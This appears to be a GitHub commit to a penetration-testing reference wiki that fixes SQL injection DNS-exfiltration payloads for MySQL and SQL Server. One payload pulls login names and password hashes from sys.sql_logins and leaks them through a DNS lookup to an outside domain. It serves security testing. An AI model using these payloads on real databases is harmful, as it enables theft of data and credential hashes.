Fix DNS-related exfiltration issues. (#6)

* Fix MySQL DNS Request Add missing period. Works on #5. * Fix SQL Server DNS request Add missing period. Works on #5. * Add contributors entry #6 (comment) Works on #5.
NetSPI · Oct 20, 2018 · e643ac8 · e643ac8
1 parent 873609f
commit e643ac8
Show file tree

Hide file tree

Showing 3 changed files with 3 additions and 2 deletions.
diff --git a/README.md b/README.md
@@ -14,6 +14,7 @@ See [CONTRIBUTING.md](https://github.com/NetSPI/WikiJekyllTheme/blob/master/CONT
 - Ben Tindell
 - Colin Salisbury
 - Eric Gruber (@egru)
+- Ian Williams (@aph3rson)
 - Jake Reynolds (@jreynoldsdev)
 - Khai Tran (@k_tr4n)
 - Rafael Seferyan

diff --git a/attackQueries/dataExfiltration/mysql.html b/attackQueries/dataExfiltration/mysql.html
@@ -13,7 +13,7 @@ <h3 id="data-exfiltration">Data Exfiltration</h3>
 </thead>
 <tbody><tr>
   <td>DNS Request</td>
-  <td>SELECT LOAD_FILE(concat('\\\\',(<strong>QUERY_WITH_ONLY_ONE_ROW</strong>), 'yourhost.com\\'))</td>
+  <td>SELECT LOAD_FILE(concat('\\\\',(<strong>QUERY_WITH_ONLY_ONE_ROW</strong>), '.yourhost.com\\'))</td>
 </tr>
 <tr>
   <td>SMB Share</td>

diff --git a/attackQueries/dataExfiltration/sqlserver.html b/attackQueries/dataExfiltration/sqlserver.html
@@ -13,7 +13,7 @@ <h3 id="data-exfiltration">Data Exfiltration</h3>
   <tbody>
     <tr>
       <td>Make DNS Request</td>
-      <td>DECLARE @host varchar(800);<br>select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + 'netspi.com' from sys.sql_logins;<br>exec('xp_fileexist "\' + @host + 'c$boot.ini"');</td>
+      <td>DECLARE @host varchar(800);<br>select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.netspi.com' from sys.sql_logins;<br>exec('xp_fileexist "\' + @host + 'c$boot.ini"');</td>
     </tr>
     <tr>
       <td>UNC Path (DNS Request)</td>